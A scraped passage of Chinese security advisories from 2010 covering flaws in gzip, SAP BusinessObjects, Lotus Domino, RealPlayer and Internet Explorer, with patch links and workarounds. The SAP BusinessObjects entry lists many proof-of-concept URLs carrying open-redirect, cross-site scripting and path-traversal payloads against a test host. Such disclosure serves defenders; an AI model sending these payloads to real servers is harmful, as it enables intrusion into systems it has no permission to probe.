ia64) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_ia64.deb Size/MD5 checksum:    96216 89b544a5f93d7607e1608d7856fa70e8 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_mipsel.deb Size/MD5 checksum:    82266 ff332d05f508dad0d3067dd713bee839 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_powerpc.deb Size/MD5 checksum:    79722 1e117918ab793443c9da0af6f137e7a7 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_s390.deb Size/MD5 checksum:    80602 4c5accebc99f8b263cef9500a94ae2ca sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_sparc.deb Size/MD5 checksum:    77262 f440c798c3fe592896286047b643116d Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1.diff.gz Size/MD5 checksum:    14580 7dac4e2e855b89ec335605722da16bd0 http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12.orig.tar.gz Size/MD5 checksum:   462169 b5bac2d21840ae077e0217bc5e4845b1 http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1.dsc Size/MD5 checksum:     1024 40c1d638034b3c9be692af4057a9499c Architecture independent packages: http://security.debian.org/pool/updates/main/g/gzip/gzip-win32_1.3.12-6+lenny1_all.deb Size/MD5 checksum:    68438 858f1373aa128793538f5e5f6e283e24 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_alpha.deb Size/MD5 checksum:   112736 2afbb523626d0793acf7e1cb4be21938 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_amd64.deb Size/MD5 checksum:   106024 68119c7d80f94457b2f241cb90bd3aee arm architecture (ARM) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_arm.deb Size/MD5 checksum:   108462 b8daebe8a54750428f6028612297e76b armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_armel.deb Size/MD5 checksum:   106906 14e79925acc936699aaa8ccee0b6d04d hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_hppa.deb Size/MD5 checksum:   111448 7e94ea327492912e21b360e45ab324d5 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_i386.deb Size/MD5 checksum:   102866 4cef436339090cd800efb7e6bb92b14b ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_ia64.deb Size/MD5 checksum:   123250 c38a5a05f04fa731340c254028d240c3 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_mipsel.deb Size/MD5 checksum:   109266 5e17c751ddc3a65085f005dddcf6426c powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_powerpc.deb Size/MD5 checksum:   109502 3ae2e1dfc3b13d0ed4574103aca3904d s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_s390.deb Size/MD5 checksum:   108896 e7b03509583f7cbed875359a2595a3a0 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_sparc.deb Size/MD5 checksum:   106462 f166981469f7fd047ceabe5f26832638 补丁安装方法： 1. 手工安装补丁包：   首先，使用下面的命令来下载补丁软件：   # wget url  (url是补丁下载链接地址)   然后，使用下面的命令来安装补丁：   # dpkg -i file.deb (file是相应的补丁名) 2. 使用apt-get自动安装补丁包：    首先，使用下面的命令更新内部数据库：    # apt-get update      然后，使用下面的命令安装更新软件包：    # apt-get upgrade GNU --- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://savannah.gnu.org/forum/forum.php?forum_id=6153 http://git.savannah.gnu.org/cgit/gzip.git/commit/?id=a3db5806d012082b9e25cc36d09f19cd736a468f RedHat ------ RedHat已经为此发布了一个安全公告（RHSA-2010:0061-02）以及相应补丁: RHSA-2010:0061-02：Moderate: gzip security update 链接：https://www.redhat.com/support/errata/RHSA-2010-0061.html Ubuntu ------ Ubuntu已经为此发布了一个安全公告（USN-889-1）以及相应补丁: USN-889-1：gzip vulnerabilities 链接：http://www.ubuntu.com/usn/USN-889-1 gzip,unlzw(),函数,漏洞 漏洞公告 admin 未知 2010-01-25 16:44 http://www.serversteam.com/S/Vuln/vuln_639.html 受影响系统： GNU gzip 1.x 不受影响系统： GNU gzip 1.4 描述：BUGTRAQ ID: 37888 CVE ID: CVE-2009-2624 gzip是一款非常流行的文件压缩工具。 gzip的inflate.c文件中的huft_build()函数解压动态Huffman代码中数据块时 受影响系统：     GNU gzip 1.x 不受影响系统：     GNU gzip 1.4 描述：BUGTRAQ  ID: 37888 CVE ID: CVE-2009-2624 gzip是一款非常流行的文件压缩工具。 gzip的inflate.c文件中的huft_build()函数解压动态Huffman代码中数据块时存在输入验证错误，用户受骗解压了特制文档就可能触发死循环或导致执行任意代码。 <*来源：Thiemo Nagel     链接：http://secunia.com/advisories/38132/         http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=507263         http://www.ubuntu.com/usn/USN-889-1         http://www.debian.org/security/2010/dsa-1974 *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ http://bugs.debian.org/cgi-bin/bugreport.cgi?msg=5;filename=segv.gz;att=1;bug=507263 建议：厂商补丁： Debian ------ Debian已经为此发布了一个安全公告（DSA-1974-1）以及相应补丁: DSA-1974-1：New gzip packages fix arbitrary code execution 链接：http://www.debian.org/security/2010/dsa-1974 补丁下载： Source archives: http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1.dsc Size/MD5 checksum:      573 4a4c81d72ed695f7e0b710fa7da00201 http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1.diff.gz Size/MD5 checksum:    62547 34c6cab73195a3b9e2b187636cf69dc2 http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5.orig.tar.gz Size/MD5 checksum:   331550 3d6c191dfd2bf307014b421c12dc8469 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_alpha.deb Size/MD5 checksum:    84202 2677656b86d648a05b54ba0c03028eb1 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_amd64.deb Size/MD5 checksum:    76988 86e571b7bf22e4924c5d7f82306ab064 arm architecture (ARM) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_arm.deb Size/MD5 checksum:    79428 7e71e302f090a62f52b7f6f5d35b627b hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_hppa.deb Size/MD5 checksum:    81616 02d1712f3f62de9f05810cd3a1660d77 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_i386.deb Size/MD5 checksum:    74324 ac441b57b7423d65985acaef2e40df9f ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_ia64.deb Size/MD5 checksum:    96216 89b544a5f93d7607e1608d7856fa70e8 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_mipsel.deb Size/MD5 checksum:    82266 ff332d05f508dad0d3067dd713bee839 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_powerpc.deb Size/MD5 checksum:    79722 1e117918ab793443c9da0af6f137e7a7 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_s390.deb Size/MD5 checksum:    80602 4c5accebc99f8b263cef9500a94ae2ca sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.5-15+etch1_sparc.deb Size/MD5 checksum:    77262 f440c798c3fe592896286047b643116d Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1.diff.gz Size/MD5 checksum:    14580 7dac4e2e855b89ec335605722da16bd0 http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12.orig.tar.gz Size/MD5 checksum:   462169 b5bac2d21840ae077e0217bc5e4845b1 http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1.dsc Size/MD5 checksum:     1024 40c1d638034b3c9be692af4057a9499c#p#分页标题#e# Architecture independent packages: http://security.debian.org/pool/updates/main/g/gzip/gzip-win32_1.3.12-6+lenny1_all.deb Size/MD5 checksum:    68438 858f1373aa128793538f5e5f6e283e24 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_alpha.deb Size/MD5 checksum:   112736 2afbb523626d0793acf7e1cb4be21938 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_amd64.deb Size/MD5 checksum:   106024 68119c7d80f94457b2f241cb90bd3aee arm architecture (ARM) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_arm.deb Size/MD5 checksum:   108462 b8daebe8a54750428f6028612297e76b armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_armel.deb Size/MD5 checksum:   106906 14e79925acc936699aaa8ccee0b6d04d hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_hppa.deb Size/MD5 checksum:   111448 7e94ea327492912e21b360e45ab324d5 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_i386.deb Size/MD5 checksum:   102866 4cef436339090cd800efb7e6bb92b14b ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_ia64.deb Size/MD5 checksum:   123250 c38a5a05f04fa731340c254028d240c3 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_mipsel.deb Size/MD5 checksum:   109266 5e17c751ddc3a65085f005dddcf6426c powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_powerpc.deb Size/MD5 checksum:   109502 3ae2e1dfc3b13d0ed4574103aca3904d s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_s390.deb Size/MD5 checksum:   108896 e7b03509583f7cbed875359a2595a3a0 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/g/gzip/gzip_1.3.12-6+lenny1_sparc.deb Size/MD5 checksum:   106462 f166981469f7fd047ceabe5f26832638 补丁安装方法： 1. 手工安装补丁包：   首先，使用下面的命令来下载补丁软件：   # wget url  (url是补丁下载链接地址)   然后，使用下面的命令来安装补丁：    # dpkg -i file.deb (file是相应的补丁名) 2. 使用apt-get自动安装补丁包：    首先，使用下面的命令更新内部数据库：    # apt-get update      然后，使用下面的命令安装更新软件包：    # apt-get upgrade GNU --- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://git.savannah.gnu.org/cgit/gzip.git/commit/?id=39a362ae9d9b007473381dba5032f4dfc1744cf2 Ubuntu ------ Ubuntu已经为此发布了一个安全公告（USN-889-1）以及相应补丁: USN-889-1：gzip vulnerabilities 链接：http://www.ubuntu.com/usn/USN-889-1 Gzip,Huffman,解压,代码,执行,漏洞 漏洞公告 admin 未知 2010-01-25 16:42 http://www.serversteam.com/S/Vuln/vuln_638.html 受影响系统： SAP BusinessObjects 12 SP1 SAP BusinessObjects 12 描述：BUGTRAQ ID: 37900 SAP BusinessObjects是一款商务智能软件和企业绩效解决方案。 BusinessObjects没有正确地过滤用户提交给CmcApp/App/frameset.jsp、 受影响系统：     SAP BusinessObjects 12 SP1     SAP BusinessObjects 12 描述：BUGTRAQ  ID: 37900 SAP BusinessObjects是一款商务智能软件和企业绩效解决方案。 BusinessObjects没有正确地过滤用户提交给CmcApp/App/frameset.jsp、CrystalReports/jsp /common/progress.jsp、PerformanceManagement/scripts/docLoadUrl.jsp页面的name 参数，提交给PerformanceManagement/jsp/viewCrystalReport.jsp页面的sReportMode参数以及提交给PlatformServices/preferences.do页面的service参数便在重新定向中使用，远程攻击者可以通过提交恶意参数请求跨域重新定向攻击。 BusinessObjects没有正确地过滤用户提交给AdminTools/querybuilder/ie.jsp和AdminTools /querybuilder/logonform.jsp页面的framework参数、提交给CrystalReports/jsp /CrystalReport_View/viewReport.jsp页面的loc参数、提交给InfoViewApp/jsp/common /actionNavFrame.jsp页面的url参数和提交给PlatformServices/preferences.do页面的service 参数便返回给了用户，这可能导致跨站脚本攻击。 通过直接访问tomcat-docs/jspapi/%c0%ae%c0%ae/WEB-INF/web.xml、CmcApp/App/home.jsp、CmcApp/logon.jsp等脚本就可以读取某些系统信息。 <*来源：Richard Brain     链接：http://secunia.com/advisories/38271/         http://secunia.com/advisories/38278/         http://secunia.com/advisories/38217/         http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr09-02         http://www.procheckup.com/vulnerability_manager/documents/document_1263821657/attachments/BusinessObj.pdf *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ http://10.0.2.221:8080/CmcApp/App/frameset.jsp?name=settings&url=http://www.procheckup.com http://10.0.2.221:6405/CmcApp/App/frameset.jsp?name=settings&url=http://www.procheckup.com http://10.0.2.221:8080/CrystalReports/jsp/common/progress.jsp?loc1&url=http://www.procheckup.com http://10.0.2.221:6405/CrystalReports/jsp/common/progress.jsp?loc1&url=http://www.procheckup.com http://10.0.2.221:8080/PerformanceManagement/scripts/docLoadUrl.jsp?url=http://www.procheckup.com http://10.0.2.221:6405/PerformanceManagement/scripts/docLoadUrl.jsp?url=http://www.procheckup.com http://10.0.2.221:8080/PerformanceManagement/jsp/viewCrystalReport.jsp?sReportMode=""%20name='1'><frame%20src="http://www.procheckup.com"%20name="pro"><" http://10.0.2.221:6405/PerformanceManagement/jsp/viewCrystalReport.jsp?sReportMode=""%20name='1'><frame%20src="http://www.procheckup.com"%20name="pro"><" http://10.0.2.221:8080/PlatformServices/preferences.do?cafWebSesInit=true&service=http://www.procheckup.com/ http://10.0.2.221:6405/PlatformServices/preferences.do?cafWebSesInit=true&service=http://www.procheckup.com/ http://10.0.2.221:8080/AdminTools/querybuilder/ie.jsp?ADD_RULE=1&AND_BTN=1&ATTRIBUTES_LIST=1&ATTRIBUTES_NOTES=1&ATTRIBUTES_PROMPT=1&BUILD_SQL_HEADER=1&BUILD_SQL_INSTRUCTION=1&EXIT=1&FINISH=1&FINISH_BTN=1&FINISH_HEADER=1&IETIPS=1&MUST_ANDOR_CLAUSES=1&MUST_SELECT_CLAUSES=1&NO_CLAUSES=1&NO_RULES=1&OR=1&OR_BTN=1&OTHER_RULE_HEADER=1&REMOVE=1&REMOVE_RULE_HEADER=1&RESET=1&RULE_HEADER=1&SELECT_SUBTITLE1=mr&SELECT_SUBTITLE2=mr&SELECT_SUBTITLE3=mr&SELECT_SUBTITLE4=mr&SPECIFY_ATTRIBUTES_PROMPT=1&SUBMIT=1&TITLE=mr&WELCOME_USER=1&framework=%22%3E%3Cscript%3Ealert(1)%3C/script%3E http://10.0.2.221:8080/AdminTools/querybuilder/logonform.jsp?APSNAME=Procheckup&AUTHENTICATION=1&LOGON=1&LOG_ON=1&NOTRECOGNIZED=1&PASSWORD=Pcu12U4&REENTER=1&TITLE=mr&UNSURE=1&USERNAME=Procheckup&WELCOME_LOGON=1&action=1&framework="><script>alert(1)</script> http://10.0.2.221:8080/AnalyticalReporting/querywizard/jsp/apply.jsp?WOMdoc=1&WOMqueryAtt=1&WOMquerycontexts=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMunit=1&bodySel=1&capSel=1&colSel=1&compactSteps=1&currReportIdx=1&defaultName=Procheckup&docid=1&doctoken=1&dummy=1&isModified=1&lang="></script><script>alert(1)</script>&lastFormatZone=1&lastOptionZone=1&lastStepIndex=1&mode=1&rowSel=1&sectionSel=1&skin=1&topURL=1&unvid=1&viewType=1&xSel=1&ySel=1&zSel=1& http://10.0.2.221:6405/AnalyticalReporting/querywizard/jsp/apply.jsp?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E& http://10.0.2.221:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script> http://10.0.2.221:6405/AnalyticalReporting/querywizard/jsp/query.jsp?lang="></script><script>alert(1)</script> http://10.0.2.221:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang=1&mode=1&queryobjs=1&resetcontexts=1&scope=1&skin="></script><script>alert(1)</script>&unvid=1& http://10.0.2.221:6405/AnalyticalReporting/querywizard/jsp/query.jsp?skin="></script><script>alert(1)</script> http://10.0.2.221:8080/AnalyticalReporting/querywizard/jsp/turnto.jsp?WOMblock=1&WOMqueryAtt=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMturnTo=1&WOMunit=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>&skin=1&unit=1& http://10.0.2.221:6405/AnalyticalReporting/querywizard/jsp/turnto.jsp?lang="></script><script>alert(1)</script> http://10.0.2.221:8080/CrystalReports/jsp/CrystalReport_View/viewReport.jsp?loc=//-->"></script><script>alert(1)</script> http://10.0.2.221:8080/InfoViewApp/jsp/common/actionNavFrame.jsp?url="></script><script>alert(1)</script> http://10.0.2.221:8080/PerformanceManagement/scripts/docLoadUrl.jsp?url=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E http://10.0.2.221:6405/PerformanceManagement/scripts/docLoadUrl.jsp?url=”></script><script>alert(1)</script> http://10.0.2.221:8080/PerformanceManagement/jsp/aa-display-flash.jsp?swf="><html><body><script>alert(1)</script> http://10.0.2.221:6405/PerformanceManagement/jsp/aa-display-flash.jsp?swf="><html><body><script>alert(1)</script> http://10.0.2.221:8080/PerformanceManagement/jsp/alertcontrol.jsp?serSes=%22%3E%3Cscript%3Ealert(1)%3C/script%3E http://10.0.2.221:6405/PerformanceManagement/jsp/alertcontrol.jsp?serSes=”><script>alert(1)</script> http://10.0.2.221:8080/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script> http://10.0.2.221:6405/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script> http://10.0.2.221:8080/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?actcontent=1&actiontype=1&actual=1&anlimage=1&columns=1&flowid="<~/XSS/*-*/STYLE=xss:e/**/xpression (location='http://www.procheckup.com')>&flowname=Procheckup&gacid=1&list=1&listname=Procheckup&listonly=1&progstatus=1&progtrend=1&progtrendImage=1&target=http://www.procheckup.com&uid=1&variance=1&viewed=1& http://10.0.2.221:6405/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?flowid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&flowname=Procheckup&progtrend=1&viewed=1& http://10.0.2.221:8080/BusinessProcessBI/axis2-web/HappyAxis.jsp http://10.0.2.221:6405/BusinessProcessBI/axis2-web/HappyAxis.jsp 建议：厂商补丁： SAP --- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.sap.com/ SAP,Business,Objects,输入,验证 漏洞公告 admin 绿盟科技 2010-01-25 16:40 http://www.serversteam.com/S/Vuln/vuln_637.html 受影响系统： IBM Lotus Domino 8.0 IBM Lotus Domino 7.0 描述：Lotus Domino是集电子邮件、文档数据库、快速应用开发技术以及Web技术为一体的电子邮件与群集平台。 远程攻击者可以通过向Lotus Domino服务器 受影响系统：     IBM Lotus Domino 8.0     IBM Lotus Domino 7.0 描述：Lotus Domino是集电子邮件、文档数据库、快速应用开发技术以及Web技术为一体的电子邮件与群集平台。 远程攻击者可以通过向Lotus Domino服务器提交恶意的LDAP请求触发堆溢出，导致执行任意代码。 <*来源：Evgeny Legerov （aland@freeradius.org）     链接：http://secunia.com/advisories/38275/ *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ http://intevydis.blogspot.com/2010/01/lotus-domino-7-probably-8-ldap-heap.html 建议：厂商补丁： IBM --- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.ers.ibm.com/ Lotus,Domino,LDAP请求,溢出,漏洞 漏洞公告 admin 绿盟科技 2010-01-25 16:38 http://www.serversteam.com/S/Vuln/vuln_636.html 受影响系统： Real Networks RealPlayer SP 1.0.1 Real Networks RealPlayer SP 1.0 Real Networks RealPlayer 11 Real Networks RealPlayer 10.x 描述：BUGTRAQ ID: 37880 CVE ID: CVE-2009-4241,CVE-2009-4242,CVE-2009-4243,CVE-2009-4244,CVE-2009-4245,CV 受影响系统：     Real Networks RealPlayer SP 1.0.1     Real Networks RealPlayer SP 1.0     Real Networks RealPlayer 11     Real Networks RealPlayer 10.x 描述：BUGTRAQ  ID: 37880 CVE ID: CVE-2009-4241,CVE-2009-4242,CVE-2009-4243,CVE-2009-4244,CVE-2009-4245,CVE-2009-4257,CVE-2009-4248,CVE-2009-4247,CVE-2009-4246 RealPlayer是一款流行的多媒体播放器。 RealPlayer解析畸形的皮肤或媒体文件时存在多个缓冲区溢出漏洞，用户受骗打开了恶意的文件就可以触发这些漏洞，导致执行任意指令。 1) 在解析包含有畸形ASMRuleBook结构的文件时可能将被破坏堆上的受控数据用作了对象指针，这可能导致堆溢出。 2) 在解析SIPR codec字段时解析了过小的长度值就可能会分配不充分的堆，之后溢出这个缓冲区。 3) 在解析带有伪造块大小的GIF文件时播放器错误的使用了来自文件的值用于在堆上分配缓冲区，可能导致堆溢出。 4) 负责解析SMIL文件的smlrender.dll库缺少正确的字符串长度检查，可能导致溢出静态的堆缓冲区。 5) 在解析.RJS皮肤文件时播放器将从web.xmb文件中所获得的某些变量长度字段拷贝到了静态大小的缓冲区中，这可能导致栈溢出。 6) RealPlayer ASM RuleBook中的错误可能导致数组溢出。 7) RealPlayer RTSP set_parameter中的错误可能导致缓冲区溢出。 <*来源：Evgeny Legerov （aland@freeradius.org）         Peter Vreugdenhil     链接：http://secunia.com/advisories/38218/         http://marc.info/?l=bugtraq&m=126410578425572&w=2         http://marc.info/?l=bugtraq&m=126410001817702&w=2         http://marc.info/?l=bugtraq&m=126410449323720&w=2         http://marc.info/?l=bugtraq&m=126409786114761&w=2         http://marc.info/?l=bugtraq&m=126410186419968&w=2 *> 建议：厂商补丁： Real Networks ------------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://service.real.com/realplayer/security/01192010_player/en/ RealPlayer,皮肤,媒体文件,缓冲,溢出,漏洞 漏洞公告 admin 绿盟科技 2010-01-25 16:33 http://www.serversteam.com/S/Vuln/vuln_635.html 受影响系统： Microsoft Internet Explorer 8.0 描述：BUGTRAQ ID: 37895 CVE ID: CVE-2010-0245 Internet Explorer是Windows操作系统中默认捆绑的web浏览器。 如果交错的strike和center标签中包含用用于操控sub或sup等字体基 受影响系统：     Microsoft Internet Explorer 8.0 描述：BUGTRAQ  ID: 37895 CVE ID: CVE-2010-0245 Internet Explorer是Windows操作系统中默认捆绑的web浏览器。 如果交错的strike和center标签中包含用用于操控sub或sup等字体基线的元素的话，则在IE渲染该标签时存在释放后使用错误。在删除这个元素指针的时候，IE之后会引用已被释放的指针。 攻击者可以通过构建特制的网页来利用该漏洞，当用户查看网页时，该漏洞可能允许远程执行代码。 <*来源：Sam Thomas     链接：http://marc.info/?l=bugtraq&m=126411339204781&w=2         http://www.us-cert.gov/cas/techalerts/TA10-021A.html         http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true *> 建议：临时解决方法： * 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。 * 将Internet 和本地Intranet安全区域设置设为“高”，以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。 厂商补丁： Microsoft --------- Microsoft已经为此发布了一个安全公告（MS10-002）以及相应补丁: MS10-002：Cumulative Security Update for Internet Explorer (978207) 链接：http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true MS10-002,IE,基线,标签,渲染 漏洞公告 admin 绿盟科技 2010-01-25 16:33 http://www.serversteam.com/S/Vuln/vuln_634.html 受影响系统： Microsoft Internet Explorer 8.0 Microsoft Internet Explorer 7.0 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 描述：BUGTRAQ ID: 37894 CVE ID: CVE-2010-0248 Internet Explorer是Windows操作系统中默认捆绑 受影响系统：     Microsoft Internet Explorer 8.0     Microsoft Internet Explorer 7.0     Microsoft Internet Explorer 6.0 SP1     Microsoft Internet Explorer 6.0 描述：BUGTRAQ  ID: 37894 CVE ID: CVE-2010-0248 Internet Explorer是Windows操作系统中默认捆绑的web浏览器。 Internet Explorer在处理JavaScript中克隆DOM对象时存在内存破坏漏洞，特制的对象克隆序列可能导致使用已经释放的指针。攻击者可以通过构建特制的网页来利用该漏洞，当用户查看网页时，漏洞可能允许远程执行代码。 <*来源：Peter Vreugdenhil     链接：http://marc.info/?l=bugtraq&m=126411117301715&w=2         http://www.us-cert.gov/cas/techalerts/TA10-021A.html         http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true *> 建议：临时解决方法： * 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。 * 将Internet 和本地Intranet安全区域设置设为“高”，以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。 * 对Internet Explorer 6或Internet Explorer 7启用DEP。 厂商补丁： Microsoft --------- Microsoft已经为此发布了一个安全公告（MS10-002）以及相应补丁: MS10-002：Cumulative Security Update for Internet Explorer (978207) 链接：http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true MS10-002,IE,克隆,DOM,内存破坏 漏洞公告 admin 绿盟科技 2010-01-25 16:31 http://www.serversteam.com/S/Vuln/vuln_633.html （MS10-002）Microsoft IE表格布局重用远程代码执行漏洞 受影响系统： Microsoft Internet Explorer 8.0 描述：BUGTRAQ ID: 37892 CVE ID: CVE-2010-0245 Internet Explorer是Windows操作系统中默认捆绑的web浏览器。 在表格容 （MS10-002）Microsoft IE表格布局重用远程代码执行漏洞 受影响系统：     Microsoft Internet Explorer 8.0 描述：BUGTRAQ  ID: 37892 CVE ID: CVE-2010-0245 Internet Explorer是Windows操作系统中默认捆绑的web浏览器。 在表格容器中使用特定的元素时，如果删除了其中一个元素，IE就会错误的从布局树中解除对该元素的链接。之后在遍历这个树的时候，IE会重新使用已经释放的对象。 攻击者可以通过构建特制的网页来利用该漏洞，当用户查看网页时，该漏洞可能允许远程执行代码。 <*来源：Sam Thomas     链接：http://marc.info/?l=bugtraq&m=126410936831349&w=2         http://www.us-cert.gov/cas/techalerts/TA10-021A.html         http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true *> 建议：临时解决方法： * 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。 * 将Internet 和本地Intranet安全区域设置设为“高”，以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。 厂商补丁： Microsoft --------- Microsoft已经为此发布了一个安全公告（MS10-002）以及相应补丁: MS10-002：Cumulative Security Update for Internet Explorer (978207) 链接：http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true MS10-002,IE,表格,布局,漏洞 漏洞公告 admin 绿盟科技 2010-01-25 16:30 http://www.serversteam.com/S/Vuln/vuln_632.html （MS10-002）Microsoft IE表格布局Col标签缓存更新远程代码执行漏洞 受影响系统： Microsoft Internet Explorer 8.0 Microsoft Internet Explorer 7.0 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 描述：BUGTRA （MS10-002）Microsoft IE表格布局Col标签缓存更新远程代码执行漏洞 受影响系统：     Microsoft Internet Explorer 8.0     Microsoft Internet Explorer 7.0     Microsoft Internet Explorer 6.0 SP1     Microsoft Internet Explorer 6.0 描述：BUGTRAQ  ID: 37891 CVE ID: CVE-2010-0244 Internet Explorer是Windows操作系统中默认捆绑的web浏览器。 在HTML表格容器中使用Col元素的时候，如果在使用表格期间删除了这个元素，则在任意元素失效后会使用表格单元格中的缓存。 攻击者可以通过构建特制的网页来利用该漏洞，当用户查看网页时，该漏洞可能允许远程执行代码。 <*来源：wushi （wooshi@gmail.com）     链接：http://marc.info/?l=bugtraq&m=126411236703431&w=2         http://www.us-cert.gov/cas/techalerts/TA10-021A.html         http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true *> 建议：临时解决方法： * 将Internet 